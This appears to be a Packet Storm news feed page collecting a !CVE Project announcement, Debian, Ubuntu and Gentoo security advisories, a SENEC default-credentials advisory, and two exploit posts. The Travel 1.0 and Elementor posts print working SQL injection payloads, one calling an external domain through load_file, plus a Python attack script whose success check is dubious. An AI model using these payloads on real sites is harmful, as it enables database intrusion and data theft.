The !CVE Project is an initiative to track and identify security issues that are not acknowledged by vendors but still are important for the security community.

=======  
Mission  
=======

The mission of !CVE (read not CVE) is to track, identify and provide a  
common space for !vulnerabilities that are not acknowledged by vendors but  
still are serious security issues.

This project was presented a few days ago at Black Hat Toronto 2023 [1]  
and will also be presented next week at DeepSec 2023 [2].

===  
Why  
===

According to MITRE's CNA rules section 7.1:

       "CNAs are left to their own discretion to determine whether  
        something is a vulnerability."[3]

This poses a clear conflict of interest, since the same vendor is the one  
deciding whether or not an issue is a vulnerability and therefore whether a  
CVE is assigned to their own product or not.

==============  
What is a !CVE  
==============

    - A common place for !vulnerabilities (read not vulnerabilities)

    - Security issues not covered by the traditional CVE.

    - An identifier following common naming starting with an exclamation  
      mark(!) Example: !CVE-2023-0001

============================  
How to request a new !CVE ID  
============================

The !CVE Project is alive and assigning !CVE-IDs for security issues that  
present an advantage for an attacker.

You can request a !CVE ID at: https://notcve.org/form.php

======================  
How !CVEs are assigned  
======================

A panel will review !CVE requests and if qualifies, a new !CVE number will  
be assigned and details will be publicly available.

==============================  
How to access to !CVEs details  
==============================

Using the search engine at https://notcve.org or a direct link to the !CVE  
entry. For example, the first ever !CVE is available at:  
https://notcve.org/view.php?id=!CVE-2023-0001

The search engine combines information from multiple sources and also  
searches for regular CVEs in all fields from all sources. For example to  
search by credit we can obtain CVE discovered by Google Project Zero:

https://notcve.org/search.php?query=Google+Project+Zero

=========================  
What qualifies for a !CVE  
=========================

Examples that qualifies for a !CVE:  
-----------------------------------  
    - A security issues that is not acknowledged by the vendor as a  
      vulnerability.

    - A security issue acknowledged by a vendor as technically correct  
      but outside their threat model.

    - A notified security issue that has not been assigned a CVE after  
      90 days.

    - A published security issue without an assigned CVE.

Examples that do NOT qualify for a !CVE:  
----------------------------------------  
    - A software defect with no impact on security.

    - A generic security issue, you need to list one or more  
      devices/software affected with your finding.

    - Well known attacks to unencrypted channels to obtain  
      credentials: Telnet, FTP, etc.

    - You can read the FAQ [4] for more examples.

In short, we see the !CVE Project as a great initiative to track and  
identify security issues that are not acknowledged by vendors but still are  
important for the security community.

==========  
References  
==========

[1]   
https://www.blackhat.com/sector/2023/arsenal/schedule/index.html#cve-a-new-platform-for-unacknowledged-cybersecurity-vulnerabilities-36144

[2] https://www.deepsec.net/speaker.html#PSLOT667

[3] https://cve.mitre.org/cve/cna/CNA_Rules_v3.0.pdf

[4] https://notcve.org/faq.html

---  
!CVE Team

[ A PGP key is available for encrypted communications at  
https://notcve.org/contact.html ]

Not CVE Announcement

Debian Linux Security Advisory 5548-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in denial of service.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5548-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
November 05, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openjdk-17  
CVE ID         : CVE-2023-22025 CVE-2023-22081

Several vulnerabilities have been discovered in the OpenJDK Java runtime,  
which may result in denial of service.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 17.0.9+9-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 17.0.9+9-1~deb12u1.

We recommend that you upgrade your openjdk-17 packages.

For the detailed security status of openjdk-17 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openjdk-17

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVH8rMACgkQEMKTtsN8  
Tjahiw/+KV2CipWhe7kpI5GXnMkCH9lOIYYv6S/zSu3RpB/zEH72QoAfJVRPazNy  
6ubJtk1kbrkc/mo6RFRw+0yVuo8czZ2NiVYc7E+pmVdCu1QT+M1BlV6xhN9KntpY  
pw2V+/+toyi0lmMRl13FgMC9loUdBHJO7zHbfNCKZAQHoBt1JK1UChwKDUC+UeGr  
0A/4wk5gMaKLMizr5nSEXsJS1D0cnAeqogIU42G6MdHTQnF1dTtXOtA3VbS+AnAl  
cPea29ALDnpruizp/7pBCu4q9hGvCrKYHxZ5ZIwfS7shfYSN0qqAtqmsw8ZSnAp6  
MlPwbdKfYWFhujvT3prQEtgPqowK+sMjSRHvjZyXIYrYK6/ORduckVpSHN3Ue3V7  
UcFKiZvVrub6YB9nFB0fbHs7FL4N/Eb75n8B5OzaHM1RrH12NNKWw9aghHEMofQB  
Isai5wglPnERZqDOYuUnrwxBfsRKGbRsYl86wYCnDBYSDtO5o6Fdp5daZBtm40dl  
fo4GoM2FVlkIFKR/xLviQ/l+q8bc3jOcT4ZtgiVlYHD5YuunT9pMxOYHHMF4NeP7  
ve+hB46m3GxVgeu50L3e7bOLEDbsMwXbhzN+IvR1IBNuwEvXUWy0jg4GZJQ30u7b  
l10rG4HjAvcL0U/axHmQcaKZWwd9cc9EfbQMUTJ5UzuSN9YcutA=  
=vysv  
-----END PGP SIGNATURE-----

Debian Security Advisory 5548-1

Travel version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: travel-1.0-by-oretnom23 Multiple-SQLi## Author: nu11secur1ty## Date: 11/12/2023## Vendor: https://github.com/oretnom23## Software: https://github.com/oretnom23/php-travel-agency-system## Reference: https://portswigger.net/web-security/sql-injection## Description:The search parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+'was submitted in the search parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```MySQL---Parameter: search (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: search=951531'+(selectload_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+''RLIKE (SELECT (CASE WHEN (2997=2997) THEN 0x393531353331+(selectload_file(0x5c5c5c5c666e366b70706278306f323664696173673374627373313938306574326b363878626c33387477692e6f6173746966792e636f6d5c5c79686a))+''ELSE 0x28 END)) AND 'RIBa'='RIBa&searc=&sumbit=Submit    Type: time-based blind    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)    Payload: search=951531'+(selectload_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+''OR (SELECT 5424 FROM (SELECT(SLEEP(15)))vzOn) AND'fGlq'='fGlq&searc=&sumbit=Submit    Type: UNION query    Title: MySQL UNION query (NULL) - 28 columns    Payload: search=951531'+(selectload_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+''UNION ALL SELECTNULL,NULL,NULL,NULL,CONCAT(0x716a767071,0x6c425375664275724e58584e686366544b776557504941584e71765144757876744972504e4f554d,0x7162767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&searc=&sumbit=Submit---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2021/travel-1.0-by-oretnom23)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/11/travel-10-by-oretnom23-multiple-sqli.html)## Time spent:00:17:00

Travel 1.0 SQL Injection

Ubuntu Security Notice 6470-1 - It was discovered that Axis incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6470-1  
November 02, 2023

axis vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

Axis could be made to crash or execute arbitrary code if it received specially  
crafted input.

Software Description:  
- axis: SOAP implementation in Java

Details:

It was discovered that Axis incorrectly handled certain inputs. If a user or  
an automated system were tricked into opening a specially crafted input file,  
a remote attacker could possibly use this issue to cause a denial of service  
or execute arbitrary code. (CVE-2023-40743)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   libaxis-java                    1.4-28+deb10u1build0.23.10.1  
   libaxis-java-doc                1.4-28+deb10u1build0.23.10.1

Ubuntu 23.04:  
   libaxis-java                    1.4-28+deb10u1build0.23.04.1  
   libaxis-java-doc                1.4-28+deb10u1build0.23.04.1

Ubuntu 22.04 LTS:  
   libaxis-java                    1.4-28+deb10u1build0.22.04.1  
   libaxis-java-doc                1.4-28+deb10u1build0.22.04.1

Ubuntu 20.04 LTS:  
   libaxis-java                    1.4-28+deb10u1build0.20.04.1  
   libaxis-java-doc                1.4-28+deb10u1build0.20.04.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   libaxis-java                    1.4-25ubuntu0.1~esm1  
   libaxis-java-doc                1.4-25ubuntu0.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   libaxis-java                    1.4-24ubuntu0.1~esm1  
   libaxis-java-doc                1.4-24ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6470-1  
   CVE-2023-40743

Package Information:  
   https://launchpad.net/ubuntu/+source/axis/1.4-28+deb10u1build0.23.10.1  
   https://launchpad.net/ubuntu/+source/axis/1.4-28+deb10u1build0.23.04.1  
   https://launchpad.net/ubuntu/+source/axis/1.4-28+deb10u1build0.22.04.1  
   https://launchpad.net/ubuntu/+source/axis/1.4-28+deb10u1build0.20.04.1

Ubuntu Security Notice USN-6470-1

Ubuntu Security Notice 6467-2 - USN-6467-1 fixed a vulnerability in Kerberos. This update provides the corresponding update for Ubuntu 20.04 LTS, Ubuntu 22.04 LTS and Ubuntu 23.04. Robert Morris discovered that Kerberos did not properly handle memory access when processing RPC data through kadmind, which could lead to the freeing of uninitialized memory. An authenticated remote attacker could possibly use this issue to cause kadmind to crash, resulting in a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6467-2  
November 06, 2023

krb5 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Kerberos could be made to crash if it received specially crafted  
network traffic.

Software Description:  
- krb5: MIT Kerberos Network Authentication Protocol

Details:

USN-6467-1 fixed a vulnerability in Kerberos. This update provides the  
corresponding update for Ubuntu 20.04 LTS, Ubuntu 22.04 LTS and Ubuntu  
23.04.

Original advisory details:

Robert Morris discovered that Kerberos did not properly handle memory  
access when processing RPC data through kadmind, which could lead to the  
freeing of uninitialized memory. An authenticated remote attacker could  
possibly use this issue to cause kadmind to crash, resulting in a denial  
of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
krb5-admin-server 1.20.1-1ubuntu0.1  
krb5-kdc 1.20.1-1ubuntu0.1  
krb5-kdc-ldap 1.20.1-1ubuntu0.1  
krb5-otp 1.20.1-1ubuntu0.1  
krb5-pkinit 1.20.1-1ubuntu0.1  
krb5-user 1.20.1-1ubuntu0.1  
libgssapi-krb5-2 1.20.1-1ubuntu0.1  
libgssrpc4 1.20.1-1ubuntu0.1  
libk5crypto3 1.20.1-1ubuntu0.1  
libkadm5clnt-mit12 1.20.1-1ubuntu0.1  
libkadm5srv-mit12 1.20.1-1ubuntu0.1  
libkdb5-10 1.20.1-1ubuntu0.1  
libkrad0 1.20.1-1ubuntu0.1  
libkrb5-3 1.20.1-1ubuntu0.1  
libkrb5support0 1.20.1-1ubuntu0.1

Ubuntu 22.04 LTS:  
krb5-admin-server 1.19.2-2ubuntu0.3  
krb5-kdc 1.19.2-2ubuntu0.3  
krb5-kdc-ldap 1.19.2-2ubuntu0.3  
krb5-otp 1.19.2-2ubuntu0.3  
krb5-pkinit 1.19.2-2ubuntu0.3  
krb5-user 1.19.2-2ubuntu0.3  
libgssapi-krb5-2 1.19.2-2ubuntu0.3  
libgssrpc4 1.19.2-2ubuntu0.3  
libk5crypto3 1.19.2-2ubuntu0.3  
libkadm5clnt-mit12 1.19.2-2ubuntu0.3  
libkadm5srv-mit12 1.19.2-2ubuntu0.3  
libkdb5-10 1.19.2-2ubuntu0.3  
libkrad0 1.19.2-2ubuntu0.3  
libkrb5-3 1.19.2-2ubuntu0.3  
libkrb5support0 1.19.2-2ubuntu0.3

Ubuntu 20.04 LTS:  
krb5-admin-server 1.17-6ubuntu4.4  
krb5-kdc 1.17-6ubuntu4.4  
krb5-kdc-ldap 1.17-6ubuntu4.4  
krb5-otp 1.17-6ubuntu4.4  
krb5-pkinit 1.17-6ubuntu4.4  
krb5-user 1.17-6ubuntu4.4  
libgssapi-krb5-2 1.17-6ubuntu4.4  
libgssrpc4 1.17-6ubuntu4.4  
libk5crypto3 1.17-6ubuntu4.4  
libkadm5clnt-mit11 1.17-6ubuntu4.4  
libkadm5srv-mit11 1.17-6ubuntu4.4  
libkdb5-9 1.17-6ubuntu4.4  
libkrad0 1.17-6ubuntu4.4  
libkrb5-3 1.17-6ubuntu4.4  
libkrb5support0 1.17-6ubuntu4.4

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6467-2  
https://ubuntu.com/security/notices/USN-6467-1  
CVE-2023-36054

Package Information:  
https://launchpad.net/ubuntu/+source/krb5/1.20.1-1ubuntu0.1  
https://launchpad.net/ubuntu/+source/krb5/1.19.2-2ubuntu0.3  
https://launchpad.net/ubuntu/+source/krb5/1.17-6ubuntu4.4

Ubuntu Security Notice USN-6467-2

Elementor Website Builder versions prior to 3.12.2 suffer from a remote SQL injection vulnerability.

    #EXPLOIT Elementor Website Builder < 3.12.2 - Admin+ SQLi#References#CVE : CVE-2023-0329#E1.Coders Open Burp Suite.In Burp Suite, go to the "Proxy" tab and set it to listen on a specific port, such as 8080.Open a new browser window or tab, and set your proxy settings to use Burp Suite on port 8080.Visit the vulnerable Elementor Website Builder site and navigate to the Tools > Replace URL page.On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL": code : http://localhost:8080/?test'),meta_key='key4'where+meta_id=SLEEP(2);#Press "Replace URL" on the Replace URL page. Burp Suite should intercept the request.Forward the intercepted request to the server by right-clicking the request in Burp Suite and selecting "Forward".The server will execute the SQL command, which will cause it to hang for 2 seconds before responding. This is a clear indication of successful SQL injection.Note: Make sure you have permission to perform these tests and have set up Burp Suite correctly. This command may vary depending on the specific setup of your server and the website builder plugin.</s References :  https://wpscan.com/vulnerability/a875836d-77f4-4306-b275-2b60efff1493/    Exploit Python  :The provided SQLi attack vector can be achieved using the following Python code with the "requests" library: This script sends a POST request to the target URL with the SQLi payload as the "data" parameter. It then checks if the response contains the SQLi payload, indicating a successful SQL injection.Please make sure you have set up your Burp Suite environment correctly. Additionally, it is important to note that this script and attack have been TESTED and are correct import requests # Set the target URL and SQLi payloadurl = "http://localhost:8080/wp-admin/admin-ajax.php"data = {    "action": "elementor_ajax_save_builder",    "editor_post_id": "1",    "post_id": "1",    "data": "test'),meta_key='key4'where+meta_id=SLEEP(2);#"} # Send the request to the target URLresponse = requests.post(url, data=data) # Check if the response indicates a successful SQL injectionif "meta_key='key4'where+meta_id=SLEEP(2);#" in response.text:    print("SQL Injection successful!")else:    print("SQL Injection failed.")

Elementor Website Builder SQL Injection

Ubuntu Security Notice 6469-1 - Ashley Newson discovered that xrdp incorrectly handled memory when processing certain incoming connections. An attacker could possibly use this issue to cause a denial of service or arbitrary code execution.

==========================================================================  
Ubuntu Security Notice USN-6469-1  
November 02, 2023

xrdp vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

xrdp could be made to crash or run programs if it received  
specially crafted network traffic.

Software Description:  
- xrdp: Remote Desktop Protocol (RDP) server

Details:

Ashley Newson discovered that xrdp incorrectly handled memory when  
processing certain incoming connections. An attacker could possibly use  
this issue to cause a denial of service or arbitrary code execution.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   xrdp                            0.9.12-1ubuntu0.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   xrdp                            0.9.5-2ubuntu0.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   xrdp                            0.6.1-2ubuntu0.3+esm2

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   xrdp                            0.6.0-1ubuntu0.1+esm2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6469-1  
   CVE-2020-4044

Package Information:  
   https://launchpad.net/ubuntu/+source/xrdp/0.9.12-1ubuntu0.1

Ubuntu Security Notice USN-6469-1

Gentoo Linux Security Advisory 202311-2 - Multiple vulnerabilities have been discovered in Netatalk, which could lead to remote code execution Versions greater than or equal to 3.1.18 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Netatalk: Multiple Vulnerabilities including root remote code execution  
     Date: November 01, 2023  
     Bugs: #837623, #881259, #915354  
       ID: 202311-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Netatalk, which could  
lead to remote code execution

Background  
==========

Netatalk is a kernel level implementation of the AppleTalk Protocol  
Suite, which allows Unix hosts to act as file, print, and time servers  
for Apple computers. It includes several script utilities, including  
etc2ps.sh.

Affected packages  
=================

Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
net-fs/netatalk  < 3.1.18      >= 3.1.18

Description  
===========

Multiple vulnerabilities have been discovered in Netatalk. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Netatalk users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-fs/netatalk-3.1.18"

References  
==========

[ 1 ] CVE-2021-31439  
      https://nvd.nist.gov/vuln/detail/CVE-2021-31439  
[ 2 ] CVE-2022-0194  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0194  
[ 3 ] CVE-2022-22995  
      https://nvd.nist.gov/vuln/detail/CVE-2022-22995  
[ 4 ] CVE-2022-23121  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23121  
[ 5 ] CVE-2022-23122  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23122  
[ 6 ] CVE-2022-23123  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23123  
[ 7 ] CVE-2022-23124  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23124  
[ 8 ] CVE-2022-23125  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23125  
[ 9 ] CVE-2022-45188  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45188

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-02

EnBw SENEC Legacy Storage Box versions 1 through 3 suffered from a default credential issue.

Advisory ID:               Ph0s-2023-004  
Product:                   EnBw - SENEC legacy storage box: V1-V3  
Manufacturer:              SENEC - a part of EnBw  
Affected Version(s):       Firmware: all (as of 2023-06-19)  
Tested Version(s):         current  
Vulnerability Type:        CWE-1392: Use of Default Credentials

Risk Level: 

CVSS v3.1 Vector:  
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)

Manufacturer Risk Level Rating:  
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:H/RL:U/RC:C  
Overall CVSS Score: 8.6

Solution Status:           Fixed  
Manufacturer Notification: 2023-06-05  
Public Disclosure:         2023-11-01  
CVE Reference:             CVE-2023-39170  
Author of Advisory:        Ph0s[4], R0ckE7

********************************************************************************

Overview:  
Foreword: 

This vulnerability was reported to the enbw-cert. we would like to  
thank enbw-cert for taking care of the vulns and patch the systems.  
we decided to publish when most of the reported vulns are patched  
to make sure nobody is harmed when 3rdparys exploit the mentioned vulns. 

About Senec:  
We are SENEC

We have been the EnBW energy independence experts since 2018 – but we have  
put our heart and soul into guiding customers on the route to independence  
since SENEC was founded in 2009. Our passion lies in actively promoting the  
energy transition with innovative ideas and pioneering products. And, 

because we don’t do things by halves, our unwavering ambition is to create  
integrated solutions that enable you to enjoy the highest possible degree  
of independence and sustainability through self-generation of solar 

electricity.

About SENEC Home:

SENEC.Home: The smart electricity storage device for your home

SENEC.Home is the heart of the your sustainable, affordable supply of solar  
electricity. The smart battery storage device stores excess electricity 

generated by your PV system so that you can use it when you need it – such as  
when your household’s energy consumption rises in the evening, or on rainy days  
when your PV system generates less power.

********************************************************************************

Vulnerability Details:

The credentials for the senec inverters are known in public.

********************************************************************************

Proof of Concept (PoC):

The attack consists of the following steps:

1. use google to optain them, eg:  
https://www.photovoltaikforum.com/thread/206930-senec-v3-hybrid-zugangsdaten/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:  
Patched by Manufacturer  
(Rolled out until September 11, 2023)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-06-01: Vulnerability discovered  
2023-06-05: Vulnerability reported to manufacturer  
2023-09-11: Patch rollout by manufacturer to affected devices  
2023-11-01: Public disclosure of vulnerability

************************************************************************

Researcher:  
Ph0s[4], R0ckE7

************************************************************************

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0  
URL: https://creativecommons.org/licenses/by/4.0/deed.en

EnBw SENEC Legacy Storage Box Default Credentials

Debian Linux Security Advisory 5546-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5546-1                   security@debian.org  
https://www.debian.org/security/                           Andres Salomon  
November 02, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : chromium  
CVE ID         : CVE-2023-5480 CVE-2023-5482 CVE-2023-5849 CVE-2023-5850   
                 CVE-2023-5851 CVE-2023-5852 CVE-2023-5853 CVE-2023-5854   
                 CVE-2023-5855 CVE-2023-5856 CVE-2023-5857 CVE-2023-5858   
                 CVE-2023-5859

Multiple security issues were discovered in Chromium, which could result  
in the execution of arbitrary code, denial of service or information  
disclosure.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 119.0.6045.105-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 119.0.6045.105-1~deb12u1.

We recommend that you upgrade your chromium packages.

For the detailed security status of chromium please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/chromium

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmVFF04ACgkQZF0CR8Nu  
djdzWhAAwLgUKUHw7DKsOlj52comEvShKoVSVrMM34ZDpcIizK/MtkQm/d7GsOU2  
D6AV6pI4vjR7mlbFiN9l99VIGF919iFsQdXdrq+49m/YafFVV3Q2EMagvhDRFRoF  
DJLtNml9gaWgvLoN77Uh0HShpoSWpVc9cXq8w+Xq8mpu+c9dkzquigY0Q0VWZqOs  
munuVIouMH7RhhCAiL+uJ67f1rDW49OEFvcFTyGWrdzpAgWP61u9Zq3iC4S9ovZP  
UprMUQt6+1wDH3/Mp020/Ln1XhCXfnlsvjXAmpygegbRttJAHwWPTyfvX0+ZdZ2h  
uLqDcF7EEtox+mZfLdVJZZVJyYugsGO5tqRk8psc77o1eW3BTaOgdSUYoereOm6O  
/47UJvpqQYRSjN52/FTGHAkXJhjOQHi0/BzSwXsi1szeNbAAUUThhSa6tXev0eTN  
xgW5xwP40gHScHEzla4rXnM/uyE/cRwBzyiocMQJi3eOREAyMGxUktruRehCSUS1  
GtUzWmFOlwtMIDPuzfK2ZJE1iv4stkfzcZtwfpHKiCkqY5fmkeSNrhVP8PmsK0bk  
kGW9AHnsLpYJj1MGNuIaGF1AxcWT6n3DrkUU7X/0ETxpA+2EVIrzgkikuq8mFfHe  
iEoBHpVeY3/iF1coGhHLFhSRD1OHECJ7ydU46Ji9fPH9tqcmTb0=  
=/Wn5  
-----END PGP SIGNATURE-----

Source

Packet Storm